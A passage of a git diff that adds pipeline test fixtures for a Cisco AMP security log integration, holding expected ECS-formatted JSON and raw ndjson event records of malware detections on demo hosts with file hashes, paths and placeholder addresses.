Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533668885361590000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533668885361590309",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:57.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469683932Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533668885361590000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533668885361590308",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:57.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469685813Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533668885361590000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533668885361590307",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:50.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469687673Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176259135965757000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176259135965757532",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"
+                }
+            },
+            "@timestamp": "2021-01-15T10:17:41.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:04.469689561Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-15T10:17:41.000Z",
+                "action": "Executed malware",
+                "id": "1489955900291000600",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296272
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:39.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469691446Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251516445164000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251516445163601",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:39.000Z",
+            "file": {
+                "name": "rjtsbks.exe",
+                "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469693323Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251516445164000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251516445163569",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log
new file mode 100644
index 00000000000..4a0581fcd4d
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log
@@ -0,0 +1,45 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 